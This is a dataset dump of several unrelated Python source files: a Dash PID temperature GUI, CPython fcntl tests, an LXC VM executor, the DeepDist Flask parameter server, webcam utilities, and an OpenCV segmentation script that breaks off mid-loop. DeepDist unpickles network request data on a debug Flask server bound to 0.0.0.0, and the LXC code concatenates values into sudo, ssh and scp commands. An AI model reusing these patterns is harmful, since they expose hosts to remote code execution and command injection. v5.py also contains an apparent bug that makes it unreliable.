source
stringlengths
3
86
python
stringlengths
75
1.04M
gui.py
# -*- coding: utf-8 -*- """ Created on Fri Oct 11 09:47:49 2019 @author: JOANRR """ import datetime import dash import dash_core_components as dcc import dash_html_components as html import dash_daq as daq from dash.dependencies import Input, Output, State from pyInstruments.pid import TemperatureController from threading import Thread from collections import deque from visa import ResourceManager import getopt import sys global N_CLICK_PREVIOUS, MAX_LENGTH N_CLICK_PREVIOUS = 0 MAX_LENGTH = 500 # Listing the available resources lresources = ResourceManager().list_resources() # Initialize the pid task p = TemperatureController() # Preparing the plot plot_layout = dict(margin = {'l': 60, 'r': 60, 'b': 60, 't': 20},\ legend = {'x': 0, 'y': 1, 'xanchor': 'left'},\ xaxis = dict(title = "Timestamp", font = dict(size = 24)),\ yaxis = dict( title = "Temperature (°C)", font = dict(size = 24)) ) calc_status = lambda x: bool(abs(int((1j**x).real))) external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets = external_stylesheets) app.title = 'PID' app.layout = html.Div(children = [ html.Div(className = 'row', children = [ html.Div(className = 'column left', children = [ daq.Indicator(id='my-daq-indicator', value=True, color="#FF6633", # className="two columns", size = 25, style = {'width': '50px', 'display': 'inline-block', 'vertical-align':'middle'} ), html.H4('Temperature stage PID setup', style = {'display': 'inline-block','vertical-align':'middle'}), dcc.Graph(id='live-update-graph', figure= {"layout": plot_layout } ), dcc.Interval( id='interval-component', interval = 1000, # in milliseconds n_intervals = 0, disabled = True ), html.Span('Multimeter address:'), dcc.Dropdown(id = 'dropdown-multimeter', options = [{'label' : name, 'value': name} for name in lresources], value = 'GPIB0::23::INSTR' if 'GPIB0::23::INSTR' in lresources else None, placeholder = 'Multimeter address', style = {'width' : '80%', 'min-width' : '150px'}, searchable = False ), html.Span('Power source address:'), dcc.Dropdown(id = 'dropdown-sourcemeter', options = [{'label' : name, 'value': name} for name in lresources], value ='GPIB0::5::INSTR' if 'GPIB0::5::INSTR' in lresources else None, placeholder = 'Sourcemeter address', style = {'width' : '80%', 'min-width' : '150px'}, searchable = False ) ]), html.Div(className = 'column middle', children = [ daq.PowerButton( id='power-button', on = None, color = "#FF5E5E", ), daq.StopButton(id='my-daq-startbutton', buttonText = 'Start', n_clicks = 0, ), daq.StopButton(id='my-daq-clearbutton', n_clicks = 0, buttonText = 'Clear', ), daq.StopButton(id='refresh-button', n_clicks = 0, buttonText = 'Refresh', ), html.P(['Sensor type:', dcc.RadioItems( id = 'rtd-type', options=[ {'label': 'Pt100', 'value': 100}, {'label': 'Pt1000', 'value': 1000} ], value = 100 ), daq.BooleanSwitch( id='cooling-switch', label = 'Cooling?', on = False, disabled = True, ), daq.NumericInput( id='max-power', label = 'Max. action (V)', min = 0.0, max = 21.00, value = 5.00, ) ]), ]), html.Div( className = 'column right', children = [ html.Div([ html.P(id = 'label-setpoint', children = 'Temperature setpoint is 20.00 °C'), dcc.Input( id='set-setpoint', type = 'number', min = 0, max = 100, value = 20.00, debounce = True, size = '10' ), html.Br(), html.Br(), html.P('Current temperature (°C)'), daq.LEDDisplay( id = 'my-curent-T', labelPosition = 'top', value = f'{0.00:05.2f}', color= "#FF5E5E", ), ], style ={'padding-top' : '25px', 'text-align' : 'center'}) ]), ]) ]) # Multiple components can update everytime interval gets fired. @app.callback([Output('live-update-graph', 'figure'), Output('my-curent-T', 'value')], [Input('interval-component', 'n_intervals'), Input('my-daq-clearbutton', 'n_clicks')], [State('live-update-graph', 'figure')]) def update_graph_live(n, n_clear,figure): # Determine which button has been clicked ctx = dash.callback_context if not ctx.triggered: button_id = 'No clicks yet' else: button_id = ctx.triggered[0]['prop_id'].split('.')[0] if button_id == 'interval-component': tstamp = datetime.datetime.now() #.strftime("%d-%m-%YT %H:%M:%S.%f") x = deque(figure['data'][0]['x'], MAX_LENGTH) y = deque(figure['data'][0]['y'], MAX_LENGTH) y2 = deque(figure['data'][1]['y'], MAX_LENGTH) x.append(tstamp) y.append( p.current_T) y2.append(p.setpoint) elif button_id == 'my-daq-clearbutton': print('Clearing') x = [] y = [] y2 = [] else: x = y = y2 = [] figure['data'] = [{ 'x': list(x), 'y': list(y), 'name': 'Current T', 'mode': 'lines+markers', 'type': 'scatter' }, { 'x': list(x), 'y': list(y2), 'name': 'Setpoint T', 'mode': 'lines+markers', 'type': 'scatter' }] if len(x) == 0: Tstring = '00.00' else: Tstring = '{0:05.2f}'.format(y[-1]) return figure, Tstring @app.callback([Output('my-daq-startbutton', 'buttonText'), Output('my-daq-indicator', 'color'), Output('interval-component', 'disabled')], [Input('my-daq-startbutton', 'n_clicks')], prevent_initial_call = True) def start_measurement(N): color = ["#00cc96", '#FF6633'] label = 'Start' status = calc_status(N + 1) try: if status is True: print('INFO: Instrument started...') p.pid_on() t = Thread(target = p.run) t.daemon = True t.start() label = 'Stop' elif status is False: print('INFO: Instrument configured and ready!') p.pid_off() label = 'Start' else: pass return label, color[int(not status)], not status except Exception as e: print('ERROR: An error occured in starting the instrument') print(e) return label, color[1], True @app.callback([Output('label-setpoint', 'children')], [Input('set-setpoint', 'value')]) def write_setpoint(value): p.setpoint = value label = f'Temperature setpoint is {p.setpoint:5.2f} °C' return [label] @app.callback([Output('my-daq-startbutton', 'disabled'), Output('my-daq-startbutton', 'n_clicks'), Output('cooling-switch', 'disabled')], [Input('power-button', 'on')], [State('my-daq-startbutton', 'n_clicks'), State('set-setpoint', 'value'), State('cooling-switch', 'on'), State('max-power', 'value'), State('dropdown-multimeter', 'value'), State('dropdown-sourcemeter', 'value'), State('rtd-type', 'value')]) def start_instrument(on, N, setpoint, cooling, max_power, mult_addr, source_addr, R0): """The cooling flag needs to be denied, as the TemperatureController.config() ask if HEATING, just the opposite""" if on is None: return True, 0, False try: if on: p.configurate(setpoint, not cooling, max_power, mult_addr, source_addr, R0) return False, N, True else: return True, 0, False except Exception as e: print('ERROR: An error occured in starting the instrument') print(e) return True, 0, False @app.callback([Output('max-power', 'label')], [Input('max-power', 'value')]) def max_power(value): p.max_poutput = value label = 'Max. action (V)' return [label] @app.callback([Output('dropdown-multimeter', 'value'), Output('dropdown-multimeter', 'options'), Output('dropdown-sourcemeter', 'value'), Output('dropdown-sourcemeter', 'options')], [Input('refresh-button', 'n_clicks')]) def refresh_resources(n): list_of_resources = ResourceManager().list_resources() default_resources = [s for s in list_of_resources if 'GPIB' in s] if len(default_resources) > 1: sourcemeter_resource = default_resources[0] multimeter_resource = default_resources[1] else: sourcemeter_resource = None multimeter_resource = None options = [{'label' : name, 'value': name} for name in list_of_resources] return multimeter_resource, options, sourcemeter_resource, options if __name__ == '__main__': # Default values debug = True port = 8052 user_reloader = False argv = sys.argv[1:] try: options, args = getopt.getopt(argv, "p:d:r:", ["port =", "debug =", "user_reloader = "]) for name, value in options: if name in ['-d', '--debug']: if value.lower() in ['true', '1']: debug = True else: debug = False elif name in ['-p', '--port']: port = value elif name in ['-r', '--user_reloader']: if value.lower() in ['true', '1']: user_reloader = True else: user_reloader = False app.run_server(debug = debug, port = port, use_reloader = user_reloader) except KeyboardInterrupt: print("Program terminated.") except Exception as e: print(e)
test_fcntl.py
"""Test program for the fcntl C module. """ import platform import os import struct import sys import unittest from multiprocessing import Process from test.support import (verbose, TESTFN, unlink, import_module, cpython_only) # Skip test if no fcntl module. fcntl = import_module('fcntl') def get_lockdata(): try: os.O_LARGEFILE except AttributeError: start_len = "ll" else: start_len = "qq" if (sys.platform.startswith(('netbsd', 'freebsd', 'openbsd')) or sys.platform == 'darwin'): if struct.calcsize('l') == 8: off_t = 'l' pid_t = 'i' else: off_t = 'lxxxx' pid_t = 'l' lockdata = struct.pack(off_t + off_t + pid_t + 'hh', 0, 0, 0, fcntl.F_WRLCK, 0) elif sys.platform.startswith('gnukfreebsd'): lockdata = struct.pack('qqihhi', 0, 0, 0, fcntl.F_WRLCK, 0, 0) elif sys.platform in ['hp-uxB', 'unixware7']: lockdata = struct.pack('hhlllii', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0) else: lockdata = struct.pack('hh'+start_len+'hh', fcntl.F_WRLCK, 0, 0, 0, 0, 0) if lockdata: if verbose: print('struct.pack: ', repr(lockdata)) return lockdata lockdata = get_lockdata() class BadFile: def __init__(self, fn): self.fn = fn def fileno(self): return self.fn def try_lockf_on_other_process_fail(fname, cmd): f = open(fname, 'wb+') try: fcntl.lockf(f, cmd) except BlockingIOError: pass finally: f.close() def try_lockf_on_other_process(fname, cmd): f = open(fname, 'wb+') fcntl.lockf(f, cmd) fcntl.lockf(f, fcntl.LOCK_UN) f.close() class TestFcntl(unittest.TestCase): def setUp(self): self.f = None def tearDown(self): if self.f and not self.f.closed: self.f.close() unlink(TESTFN) def test_fcntl_fileno(self): # the example from the library docs self.f = open(TESTFN, 'wb') rv = fcntl.fcntl(self.f.fileno(), fcntl.F_SETFL, os.O_NONBLOCK) if verbose: print('Status from fcntl with O_NONBLOCK: ', rv) rv = fcntl.fcntl(self.f.fileno(), fcntl.F_SETLKW, lockdata) if verbose: print('String from fcntl with F_SETLKW: ', repr(rv)) self.f.close() def test_fcntl_file_descriptor(self): # again, but pass the file rather than numeric descriptor self.f = open(TESTFN, 'wb') rv = fcntl.fcntl(self.f, fcntl.F_SETFL, os.O_NONBLOCK) if verbose: print('Status from fcntl with O_NONBLOCK: ', rv) rv = fcntl.fcntl(self.f, fcntl.F_SETLKW, lockdata) if verbose: print('String from fcntl with F_SETLKW: ', repr(rv)) self.f.close() def test_fcntl_bad_file(self): with self.assertRaises(ValueError): fcntl.fcntl(-1, fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(ValueError): fcntl.fcntl(BadFile(-1), fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(TypeError): fcntl.fcntl('spam', fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(TypeError): fcntl.fcntl(BadFile('spam'), fcntl.F_SETFL, os.O_NONBLOCK) @cpython_only def test_fcntl_bad_file_overflow(self): from _testcapi import INT_MAX, INT_MIN # Issue 15989 with self.assertRaises(OverflowError): fcntl.fcntl(INT_MAX + 1, fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(OverflowError): fcntl.fcntl(BadFile(INT_MAX + 1), fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(OverflowError): fcntl.fcntl(INT_MIN - 1, fcntl.F_SETFL, os.O_NONBLOCK) with self.assertRaises(OverflowError): fcntl.fcntl(BadFile(INT_MIN - 1), fcntl.F_SETFL, os.O_NONBLOCK) @unittest.skipIf( platform.machine().startswith('arm') and platform.system() == 'Linux', "ARM Linux returns EINVAL for F_NOTIFY DN_MULTISHOT") def test_fcntl_64_bit(self): # Issue #1309352: fcntl shouldn't fail when the third arg fits in a # C 'long' but not in a C 'int'. try: cmd = fcntl.F_NOTIFY # This flag is larger than 2**31 in 64-bit builds flags = fcntl.DN_MULTISHOT except AttributeError: self.skipTest("F_NOTIFY or DN_MULTISHOT unavailable") fd = os.open(os.path.dirname(os.path.abspath(TESTFN)), os.O_RDONLY) try: fcntl.fcntl(fd, cmd, flags) finally: os.close(fd) def test_flock(self): # Solaris needs readable file for shared lock self.f = open(TESTFN, 'wb+') fileno = self.f.fileno() fcntl.flock(fileno, fcntl.LOCK_SH) fcntl.flock(fileno, fcntl.LOCK_UN) fcntl.flock(self.f, fcntl.LOCK_SH | fcntl.LOCK_NB) fcntl.flock(self.f, fcntl.LOCK_UN) fcntl.flock(fileno, fcntl.LOCK_EX) fcntl.flock(fileno, fcntl.LOCK_UN) self.assertRaises(ValueError, fcntl.flock, -1, fcntl.LOCK_SH) self.assertRaises(TypeError, fcntl.flock, 'spam', fcntl.LOCK_SH) @unittest.skipIf(platform.system() == "AIX", "AIX returns PermissionError") def test_lockf_exclusive(self): self.f = open(TESTFN, 'wb+') cmd = fcntl.LOCK_EX | fcntl.LOCK_NB fcntl.lockf(self.f, cmd) p = Process(target=try_lockf_on_other_process_fail, args=(TESTFN, cmd)) p.start() p.join() fcntl.lockf(self.f, fcntl.LOCK_UN) self.assertEqual(p.exitcode, 0) @unittest.skipIf(platform.system() == "AIX", "AIX returns PermissionError") def test_lockf_share(self): self.f = open(TESTFN, 'wb+') cmd = fcntl.LOCK_SH | fcntl.LOCK_NB fcntl.lockf(self.f, cmd) p = Process(target=try_lockf_on_other_process, args=(TESTFN, cmd)) p.start() p.join() fcntl.lockf(self.f, fcntl.LOCK_UN) self.assertEqual(p.exitcode, 0) @cpython_only def test_flock_overflow(self): import _testcapi self.assertRaises(OverflowError, fcntl.flock, _testcapi.INT_MAX+1, fcntl.LOCK_SH) @unittest.skipIf(sys.platform != 'darwin', "F_GETPATH is only available on macos") def test_fcntl_f_getpath(self): self.f = open(TESTFN, 'wb') expected = os.path.abspath(TESTFN).encode('utf-8') res = fcntl.fcntl(self.f.fileno(), fcntl.F_GETPATH, bytes(len(expected))) self.assertEqual(expected, res) if __name__ == '__main__': unittest.main()
lxc_executor.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import logging from vmchecker.generic_executor import Host,VM _logger = logging.getLogger('vm_executor') from threading import Thread import time class LXCHost(Host): def getVM(self, bundle_dir, sb_cfg): return LXCVM(self, bundle_dir, sb_cfg) class LXCVM(VM): def __init__(self, host, bundle_dir, sb_cfg): VM.__init__(self, host, bundle_dir, sb_cfg) self.hostname = self.machinecfg.get_vm_path() def executeCommand(self,cmd): return self.host.executeCommand("ssh "+self.username+"@"+self.hostname+" "+cmd) def start(self): self.host.executeCommand("sudo lxc-start -n "+self.hostname+" -d") while True: if self.hasStarted(): return def stop(self): self.host.executeCommand("sudo lxc-stop -n "+self.hostname) def hasStarted(self): time.sleep(1) o = self.host.executeCommand("sudo lxc-info -n "+self.hostname) print "not started" if "-1" in o: return False if "refused" in self.executeCommand('echo hello'): return False return True def revert(self, number = None): ''' TODO: 1. replace hardcoded paths with configurable options 2. provide a way for starting multiple containters at the same time ''' if number==None: number = 1 self.host.executeCommand("sudo lxc-stop -n "+self.hostname) self.host.executeCommand("sudo lxc-restore "+self.hostname+" "+str(number)) def copyTo(self, sourceDir, targetDir, files): """ Copy files from host(source) to guest(target) """ for f in files: host_path = os.path.join(sourceDir, f) guest_path = os.path.join(targetDir, f) #guest_path = "/var/lib/lxc/"+self.hostname+"/rootfs"+guest_path if not os.path.exists(host_path): _logger.error('host file (to send) "%s" does not exist' % host_path) return _logger.info('copy file %s from host to guest at %s' % (host_path, guest_path)) #self.host.executeCommand("sudo cp %s %s" % (host_path,guest_path)) self.host.executeCommand("scp -r "+host_path+" "+self.username+"@"+self.hostname+":"+guest_path) def copyFrom(self, sourceDir, targetDir, files): """ Copy files from guest(source) to host(target) """ for f in files: host_path = os.path.join(targetDir, f) guest_path = os.path.join(sourceDir, f) #guest_path = "/var/lib/lxc/"+self.hostname+"/rootfs"+guest_path _logger.info('copy file %s from guest to host at %s' % (guest_path, host_path)) #self.host.executeCommand("sudo cp %s %s" % (guest_path,host_path)) self.host.executeCommand("scp -r "+self.username+"@"+self.hostname+":"+guest_path+" "+host_path) if not os.path.exists(host_path): _logger.error('host file (received) "%s" does not exist' % host_path) def run(self, shell, executable_file, timeout): self.executeCommand("chmod +x "+ executable_file) _logger.info('executing on the remote: prog=%s args=[%s] timeout=%d' % (shell, executable_file, timeout)) thd = Thread(target = self.executeCommand, args = (executable_file,)) thd.start() if timeout==None: thd.join() else: thd.join(timeout) return thd.isAlive()
deepdist.py
import copy import cPickle as pickle from multiprocessing import Process from rwlock import RWLock import socket import sys from threading import Thread import urllib2 import urlparse """Lightning-Fast Deep Learning on Spark """ class DeepDist: def __init__(self, model, master='127.0.0.1:5000', min_updates=0, max_updates=4096): """DeepDist - Distributed deep learning. :param model: provide a model that can be trained in parallel on the workers """ self.model = model self.lock = RWLock() self.descent = lambda model, gradient: model self.master = master self.state = 'serving' self.served = 0 self.received = 0 #self.server = None self.pmodel = None self.min_updates = min_updates self.max_updates = max_updates def __enter__(self): Thread(target=self.start).start() # self.server = Process(target=self.start) # self.server.start() return self def __exit__(self, type, value, traceback): # self.server.terminate() pass # need to shut down server here def start(self): from flask import Flask, request app = Flask(__name__) @app.route('/') def index(): return 'DeepDist' @app.route('/model', methods=['GET', 'POST', 'PUT']) def model_flask(): i = 0 while (self.state != 'serving' or self.served >= self.max_updates) and (i < 1000): time.sleep(1) i += 1 # pickle on first read pmodel = None self.lock.acquire_read() if not self.pmodel: self.lock.release() self.lock.acquire_write() if not self.pmodel: self.pmodel = pickle.dumps(self.model, -1) self.served += 1 pmodel = self.pmodel self.lock.release() else: self.served += 1 pmodel = self.pmodel self.lock.release() return pmodel @app.route('/update', methods=['GET', 'POST', 'PUT']) def update_flask(): gradient = pickle.loads(request.data) self.lock.acquire_write() if self.min_updates <= self.served: state = 'receiving' self.received += 1 self.descent(self.model, gradient) if self.received >= self.served and self.min_updates <= self.received: self.received = 0 self.served = 0 self.state = 'serving' self.pmodel = None self.lock.release() return 'OK' print 'Listening to 0.0.0.0:5000...' app.run(host='0.0.0.0', debug=True, threaded=True, use_reloader=False) def train(self, rdd, gradient, descent): master = self.master # will be pickled if master == None: master = rdd.ctx._conf.get('spark.master') if master.startswith('local['): master = 'localhost:5000' else: if master.startswith('spark://'): master = '%s:5000' % urlparse.urlparse(master).netloc.split(':')[0] else: master = '%s:5000' % master.split(':')[0] print '\n*** Master: %s\n' % master self.descent = descent def mapPartitions(data): return [send_gradient(gradient(fetch_model(master=master), data), master=master)] return rdd.mapPartitions(mapPartitions).collect() def fetch_model(master='localhost:5000'): request = urllib2.Request('http://%s/model' % master, headers={'Content-Type': 'application/deepdist'}) return pickle.loads(urllib2.urlopen(request).read()) def send_gradient(gradient, master='localhost:5000'): if not gradient: return 'EMPTY' request = urllib2.Request('http://%s/update' % master, pickle.dumps(gradient, -1), headers={'Content-Type': 'application/deepdist'}) return urllib2.urlopen(request).read()
app_utils.py
# From http://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/ import struct import six import collections import cv2 import datetime from threading import Thread from matplotlib import colors class FPS: def __init__(self): # store the start time, end time, and total number of frames # that were examined between the start and end intervals self._start = None self._end = None self._numFrames = 0 def start(self): # start the timer self._start = datetime.datetime.now() return self def stop(self): # stop the timer self._end = datetime.datetime.now() def update(self): # increment the total number of frames examined during the # start and end intervals self._numFrames += 1 def elapsed(self): # return the total number of seconds between the start and # end interval return (self._end - self._start).total_seconds() def fps(self): # compute the (approximate) frames per second return self._numFrames / self.elapsed() class WebcamVideoStream: def __init__(self, src, width, height): # initialize the video camera stream and read the first frame # from the stream self.stream = cv2.VideoCapture(src) self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height) (self.grabbed, self.frame) = self.stream.read() # initialize the variable used to indicate if the thread should # be stopped self.stopped = False def start(self): # start the thread to read frames from the video stream Thread(target=self.update, args=()).start() return self def update(self): # keep looping infinitely until the thread is stopped while True: # if the thread indicator variable is set, stop the thread if self.stopped: return # otherwise, read the next frame from the stream (self.grabbed, self.frame) = self.stream.read() def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True def standard_colors(): colors = [ 'AliceBlue', 'Chartreuse', 'Aqua', 'Aquamarine', 'Azure', 'Beige', 'Bisque', 'BlanchedAlmond', 'BlueViolet', 'BurlyWood', 'CadetBlue', 'AntiqueWhite', 'Chocolate', 'Coral', 'CornflowerBlue', 'Cornsilk', 'Crimson', 'Cyan', 'DarkCyan', 'DarkGoldenRod', 'DarkGrey', 'DarkKhaki', 'DarkOrange', 'DarkOrchid', 'DarkSalmon', 'DarkSeaGreen', 'DarkTurquoise', 'DarkViolet', 'DeepPink', 'DeepSkyBlue', 'DodgerBlue', 'FireBrick', 'FloralWhite', 'ForestGreen', 'Fuchsia', 'Gainsboro', 'GhostWhite', 'Gold', 'GoldenRod', 'Salmon', 'Tan', 'HoneyDew', 'HotPink', 'IndianRed', 'Ivory', 'Khaki', 'Lavender', 'LavenderBlush', 'LawnGreen', 'LemonChiffon', 'LightBlue', 'LightCoral', 'LightCyan', 'LightGoldenRodYellow', 'LightGray', 'LightGrey', 'LightGreen', 'LightPink', 'LightSalmon', 'LightSeaGreen', 'LightSkyBlue', 'LightSlateGray', 'LightSlateGrey', 'LightSteelBlue', 'LightYellow', 'Lime', 'LimeGreen', 'Linen', 'Magenta', 'MediumAquaMarine', 'MediumOrchid', 'MediumPurple', 'MediumSeaGreen', 'MediumSlateBlue', 'MediumSpringGreen', 'MediumTurquoise', 'MediumVioletRed', 'MintCream', 'MistyRose', 'Moccasin', 'NavajoWhite', 'OldLace', 'Olive', 'OliveDrab', 'Orange', 'OrangeRed', 'Orchid', 'PaleGoldenRod', 'PaleGreen', 'PaleTurquoise', 'PaleVioletRed', 'PapayaWhip', 'PeachPuff', 'Peru', 'Pink', 'Plum', 'PowderBlue', 'Purple', 'Red', 'RosyBrown', 'RoyalBlue', 'SaddleBrown', 'Green', 'SandyBrown', 'SeaGreen', 'SeaShell', 'Sienna', 'Silver', 'SkyBlue', 'SlateBlue', 'SlateGray', 'SlateGrey', 'Snow', 'SpringGreen', 'SteelBlue', 'GreenYellow', 'Teal', 'Thistle', 'Tomato', 'Turquoise', 'Violet', 'Wheat', 'White', 'WhiteSmoke', 'Yellow', 'YellowGreen' ] return colors def color_name_to_rgb(): colors_rgb = [] for key, value in colors.cnames.items(): colors_rgb.append((key, struct.unpack('BBB', bytes.fromhex(value.replace('#', ''))))) return dict(colors_rgb) def draw_boxes_and_labels( boxes, classes, scores, category_index, instance_masks=None, keypoints=None, max_boxes_to_draw=5, min_score_thresh=.8, agnostic_mode=False): #Draws a maximum of 20 boxes(max_boxes_to_draw = 20) in the frame and requires a score of atleast 50%(min_score_thresh = .5) to draw a box for an object. """Returns boxes coordinates, class names and colors Args: boxes: a numpy array of shape [N, 4] classes: a numpy array of shape [N] scores: a numpy array of shape [N] or None. If scores=None, then this function assumes that the boxes to be plotted are groundtruth boxes and plot all boxes as black with no classes or scores. category_index: a dict containing category dictionaries (each holding category index `id` and category name `name`) keyed by category indices. instance_masks: a numpy array of shape [N, image_height, image_width], can be None keypoints: a numpy array of shape [N, num_keypoints, 2], can be None max_boxes_to_draw: maximum number of boxes to visualize. If None, draw all boxes. min_score_thresh: minimum score threshold for a box to be visualized agnostic_mode: boolean (default: False) controlling whether to evaluate in class-agnostic mode or not. This mode will display scores but ignore classes. """ # Create a display string (and color) for every box location, group any boxes # that correspond to the same location. box_to_display_str_map = collections.defaultdict(list) box_to_color_map = collections.defaultdict(str) box_to_instance_masks_map = {} box_to_keypoints_map = collections.defaultdict(list) if not max_boxes_to_draw: max_boxes_to_draw = boxes.shape[0] for i in range(min(max_boxes_to_draw, boxes.shape[0])): if scores is None or scores[i] > min_score_thresh: box = tuple(boxes[i].tolist()) if instance_masks is not None: box_to_instance_masks_map[box] = instance_masks[i] if keypoints is not None: box_to_keypoints_map[box].extend(keypoints[i]) if scores is None: box_to_color_map[box] = 'black' else: if not agnostic_mode: if classes[i] in category_index.keys(): class_name = category_index[classes[i]]['name'] else: class_name = 'N/A' display_str = '{}: {}%'.format( class_name, int(100 * scores[i])) else: display_str = 'score: {}%'.format(int(100 * scores[i])) box_to_display_str_map[box].append(display_str) if agnostic_mode: box_to_color_map[box] = 'DarkOrange' else: box_to_color_map[box] = standard_colors()[ classes[i] % len(standard_colors())] # Store all the coordinates of the boxes, class names and colors color_rgb = color_name_to_rgb() rect_points = [] class_names = [] class_colors = [] for box, color in six.iteritems(box_to_color_map): ymin, xmin, ymax, xmax = box rect_points.append(dict(ymin=ymin, xmin=xmin, ymax=ymax, xmax=xmax)) class_names.append(box_to_display_str_map[box]) class_colors.append(color_rgb[color.lower()]) return rect_points, class_names, class_colors
v5.py
#C1949699 # from asyncio.windows_events import NULL import numpy as np import argparse import random import time import cv2 from cv2 import imshow from cv2 import waitKey import os from multiprocessing import Process confsThr = 0.4 boxThr = 0.45 #Loading in rcnn mask model net = cv2.dnn.readNetFromTensorflow("dnn\\frozen_inference_graph_coco.pb","dnn\\mask_rcnn_inception_v2_coco_2018_01_28.pbtxt") #Loading in bounding box model net2 = cv2.dnn_DetectionModel("frozen_inference_graph.pb","ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt") net2.setInputSize(320,320) net2.setInputScale(1.0/127.5) net2.setInputMean((127.5,127.5,127.5)) net2.setInputSwapRB(True) #load our input image and grab its spatial dimensions def find_optimal_lines(ogSlice,numb):#attempts to find the best parameters to use for the canny edge detector temp = ogSlice.copy() temp = cv2.GaussianBlur(ogSlice, (13,13), cv2.BORDER_CONSTANT) # ogSlice = cv2.Canny(ogSlice,125,150) temp = cv2.Canny(temp,100,175) size = np.size(temp) whiteCount = np.count_nonzero(temp) compactness = (whiteCount/size)*100 # while (compactness < 6 or compactness > 9): if compactness < 3: temp = ogSlice.copy() temp = cv2.GaussianBlur(ogSlice, (5,5), cv2.BORDER_CONSTANT) temp = cv2.Canny(temp,100,175) size = np.size(temp) whiteCount = np.count_nonzero(temp) compactness = (whiteCount/size)*100 if compactness < 3.5: temp = ogSlice.copy() temp = cv2.GaussianBlur(ogSlice, (5,5), cv2.BORDER_CONSTANT) # threshold temp = cv2.Canny(temp,100,175) size = np.size(temp) whiteCount = np.count_nonzero(temp) compactness = (whiteCount/size)*100 if compactness > 8: temp = ogSlice.copy() temp = cv2.GaussianBlur(ogSlice, (7,7), cv2.BORDER_REFLECT) temp = cv2.Canny(temp,100,175) size = np.size(temp) whiteCount = np.count_nonzero(temp) compactness = (whiteCount/size)*100 if compactness > 9: temp = ogSlice.copy() temp = cv2.GaussianBlur(ogSlice, (9,9), cv2.BORDER_CONSTANT) temp = cv2.Canny(temp,100,175) size = np.size(temp) whiteCount = np.count_nonzero(temp) compactness = (whiteCount/size)*100 if compactness < 6: temp = ogSlice.copy() temp = cv2.GaussianBlur(ogSlice, (5,5), cv2.BORDER_CONSTANT) # threshold temp = cv2.Canny(temp,150,175) size = np.size(temp) whiteCount = np.count_nonzero(temp) compactness = (whiteCount/size)*100 return temp def fillSmallSpace(img, workerRange,x,y):#function fills in small gaps between 2 white pixels count = 0 down = 0 up = 0 left = 0 right = 0 tempFalse = False for i in range(x+1,min(x+workerRange,len(img))): if img[i][y] != 0: if tempFalse!= True: count+=1 down+=1 tempFalse=True break tempFalse = False for i in range(x-1,max(x-workerRange,-1),-1): if img[i][y] != 0: if tempFalse != True: count+=1 up+=1 tempFalse=True break if count == 2: return count else: count = 0 tempFalse = False for i in range(y+1,min(y+workerRange,len(img[0])-1)): if img[x][i] != 0: if tempFalse!= True: count+=1 right+=1 tempFalse=True break tempFalse = False for i in range(y-1,max(y-workerRange,-1),-1): if img[x][i] != 0: if tempFalse != True: count+=1 left+=1 tempFalse=True break return count def smoothing(mask,lineImage, workerRange,x,y):#function looking for neighbours in 4 directions maskCount = 0 lineCount = 0 tempFalse = False for i in range(x+1,min(x+workerRange,len(mask))): if mask[i][y] != 0: if tempFalse!= True: maskCount+=1 tempFalse=True break elif lineImage[i][y] != 0: if tempFalse != True: lineCount+=1 tempFalse=True break tempFalse = False for i in range(x-1,max(x-workerRange,-1),-1): if mask[i][y] != 0: if tempFalse!= True: maskCount+=1 tempFalse=True break elif lineImage[i][y] != 0: if tempFalse != True: lineCount+=1 tempFalse=True break tempFalse = False for i in range(y+1,min(y+workerRange,len(mask[0])-1)): if mask[x][i] != 0: if tempFalse!= True: maskCount+=1 tempFalse=True break elif lineImage[x][i] != 0: if tempFalse != True: lineCount+=1 tempFalse=True break tempFalse = False for i in range(y-1,max(y-workerRange,-1),-1): if mask[x][i] != 0: if tempFalse!= True: maskCount+=1 tempFalse=True break elif lineImage[x][i] != 0: if tempFalse != True: lineCount+=1 tempFalse=True break return lineCount,maskCount def run_algorithm(img, numb): H, W, _ = img.shape # Create black image with same dimensions as input image black_image = np.zeros((H, W), np.uint8)# creates black image from input image so it has the same dimensions # Detect objects inside input image blob = cv2.dnn.blobFromImage(img, swapRB=True) net.setInput(blob) boxes, masks = net.forward(["detection_out_final", "detection_masks"])#parses the image top the network and gets the binary mask _, _, boxes2 = net2.detect(img,confThreshold = boxThr)#parses the image top the network and gets the output boxes detection_count = boxes.shape[2] boundingBox = [] for i in range(detection_count):#looks through all the detections of the network and skips over the ones that are below the threshold box = boxes[0, 0, i] classID = int(box[1]) confidence = box[2] if confidence < confsThr: continue #Get box coordinates box = boxes[0, 0, i, 3:7] * np.array([W, H, W, H]) (x1, y1, x2, y2) = box.astype("int") # boundingBox.append([x1,y1,x2,y2]) roi_Width = x2 - x1 roi_Height = y2 - y1 mask = masks[i, classID] mask = cv2.resize(mask, (roi_Width, roi_Height),interpolation=cv2.INTER_CUBIC) _, mask = cv2.threshold(mask, 0.6, 255, cv2.THRESH_BINARY) for i in range(len(mask)): for j in range(len(mask[0])): if mask[i][j] != 0: black_image[i+y1][j+x1] = mask[i][j] for box in boxes2: boundingBox.append([box[0],box[1],box[2]+box[0],box[3]+box[1]]) maxX = 0 maxY = 0 minX = len(img)*len(img[0]) minY = len(img)*len(img[0]) for box in boundingBox:#finds the bounding region of all the bounding boxes maxX = max(maxX,box[2]) maxY = max(maxY,box[3]) minX = min(minX,box[0]) minY = min(minY,box[1]) ogSlice = img[minY:maxY, minX:maxX]#slice is set to the bounding area maskSlice = black_image[minY:maxY, minX:maxX] ogSlice = (ogSlice,numb) ogSlice = cv2.dilate(ogSlice,(5,5),iterations=3) # cv2.imshow("OG Slice ", ogSlice) newSlice = ogSlice.copy() newSlice.fill(0) for b in boundingBox: for i in range(b[0]-minX,(b[2])-minX): for j in range(b[1]-minY,(b[3])-minY): 